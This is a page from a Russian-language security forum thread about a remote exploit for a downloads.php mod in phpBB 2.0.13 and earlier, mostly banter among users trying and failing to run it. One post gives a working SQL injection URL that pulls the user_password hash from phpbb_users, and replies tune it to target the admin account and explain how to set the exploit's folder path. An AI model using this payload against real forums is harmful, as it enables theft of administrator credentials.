Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 2 3 4 След.
RSS
phpBB <= 2.0.13 'downloads.php' mod Remote Exploit
 
мдаааа phpbb не рульная, сплоит на сплоите, юзайте
IPB и нет проблем.
 
downloads.php mod in phpBB <= 2.0.13
**********************************
 [~] Connecting...
 [+] Connected
 [~] Sending Data...
 [~] Data Sent, Waiting for response...
 [-] Exploit failed

[IMG]http://www.securitylab.ru/forum/smileys/smiley19.gif[/IMG]

И так на многих...
 
Бл*, ну вы и ламаки все. Лол полный.

!, а тебе так вобще надо матчасть читать, а аттач моде этого файла вобще нет, дурень!
 
Цитата
Гость пишет:
мдаааа phpbb не рульная, сплоит на сплоите, юзайте
IPB и нет проблем.
полный лол
IBP - аналогично
дыры есть, потому что их ищут и находят
(а потом залатывают)
ибо популярный форум
самый популярный!
и самый удобный
ибо phpbb рулезз

млин! опустился до ТАКОГО языка..
но что делать!
 
скрипткидисы каждый день находят новые дыры и так все и будет. [IMG]http://www.securitylab.ru/forum/smileys/smiley36.gif[/IMG]
 
Цитата
Гость пишет:
 downloads.php mod in phpBB <= 2.0.13
**********************************
 [~] Connecting...
 [+] Connected
 [~] Sending Data...
 [~] Data Sent, Waiting for response...
 [-] Exploit failed

[IMG]http://www.securitylab.ru/forum/smileys/smiley19.gif[/IMG]

И так на многих...
Может просто там где ты это пробовал,неустановлен этот модуль? =)))
 
как им пользаваться

downloads.php?cat=-1%20UNION%20S ELECT%200,user_password,0,0,0,0,0,0,0%20FROM%20phpbb_users%2 0WHERE%20user_id=1/*
 
Цитата
liauliau пишет:
как им пользаваться

downloads.php?cat=-1%20UNION%20S ELECT%200,user_password,0,0,0,0,0,0,0%20FROM%20phpbb_users%2 0WHERE%20user_id=1/*
Тока user_id надо 2. т.к. в phpbb обычно у админа id=2
 
обьясните ламеру,зачем этот сплоит вообще нужен,если в предедущей баги phpbb,можно было узнать не тока хешь админа,но и все пользователей,смысл этого сплоита,да ещё и искать где daownloads.php есть.... [IMG]http://www.securitylab.ru/forum/smileys/smiley5.gif[/IMG]
 
DSR_
Никогда не задумывался, что прошлые баги могут быть профикшены?  [IMG]http://www.securitylab.ru/forum/smileys/smiley17.gif[/IMG]
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Чем расшифровать пароли из phpbb_db_backup.
 
А где нужно прописывать етот код обясните чайнику пробовал на Visual C++ не получается пишет что ошибки есть
 
Цитата
Yo пишет:
А где нужно прописывать етот код обясните чайнику пробовал на Visual C++ не получается пишет что ошибки есть



LMAO !
 
Цитата
Yo пишет:
А где нужно прописывать етот код обясните чайнику пробовал на Visual C++ не получается пишет что ошибки есть
Ну ты даёш =)))

#!/usr/bin/perl -w
Эта строчка тебе что-нить говарит?

Если нет ,то подскажу.Это PERL =))
 
Помоему на этом сайте работает только для пользователя info
 
Ой бл...ин!
Ну можно просто писать книжку с перлами ламеров... эх... Ну когда люди начнут вначале читать умные книжки по программированию(хотя-бы для webа) и по структуре сети, а потом уже будут что-то пытаться ломать... я такого количества просто убийственных фраз в одном топике никогда не видел!
(Одна фраза:
Цитата
Yo пишет:
А где нужно прописывать етот код обясните чайнику пробовал на Visual C++ не получается пишет что ошибки есть
чего стоит)
Уф...
 
И вообще хоть ктонибудь из подобных пробовал прочитать топик сначала??? Половина вопросов отпала-бы...
 
Извините за тупость, но в переменную folder надо загонять полный путь до уязвимой страницы или только название папки с форумом на серваке(а то у меня глюк: толи лыжи не едут толи я ебану...)
 
А где найти топик про типы данных в autologin ??/ чета не могу найти  [IMG]http://www.securitylab.ru/forum/smileys/smiley18.gif[/IMG]
 
2 l0k1
тока название папки
например
/phpBB2/

/forum/
Страницы: Пред. 1 2 3 4 След.
Читают тему